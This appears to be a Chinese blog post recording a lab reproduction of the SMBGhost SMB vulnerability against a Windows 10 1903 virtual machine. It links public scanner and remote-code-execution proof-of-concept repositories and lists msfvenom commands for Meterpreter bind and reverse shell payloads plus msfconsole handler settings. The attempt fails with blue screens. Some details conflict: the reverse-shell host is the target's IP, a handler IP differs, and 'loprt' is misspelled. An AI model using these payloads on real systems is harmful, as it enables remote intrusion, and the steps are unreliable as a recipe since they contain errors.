永恒之黑复现

永恒之黑复现

准备

  1. 目标主机

    • Windows 10, Version 1903

      下载链接:ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

    • IP 192.168.31.126

  2. kail linux

检测

image-20201223175655974

漏洞检测

https://github.com/ollypwn/SMBGhost/archive/master.zip

image-20201223190648547

连接

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.126 LPORT=1234 -f python -o 123.py

Poc

https://github.com/chompie1337/SMBGhost_RCE_PoC/archive/master.zip

替换,注意buf改为user_payload

msfconsole 
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set loprt 4444
set rhost 192.168.8.112

蓝屏。。。

set payload windows/x64/meterpreter/reverse_tcp

蓝屏。。。

可能是内存问题

posted @ 2021-04-28 00:04  best0st  阅读(169)  评论(0)    收藏  举报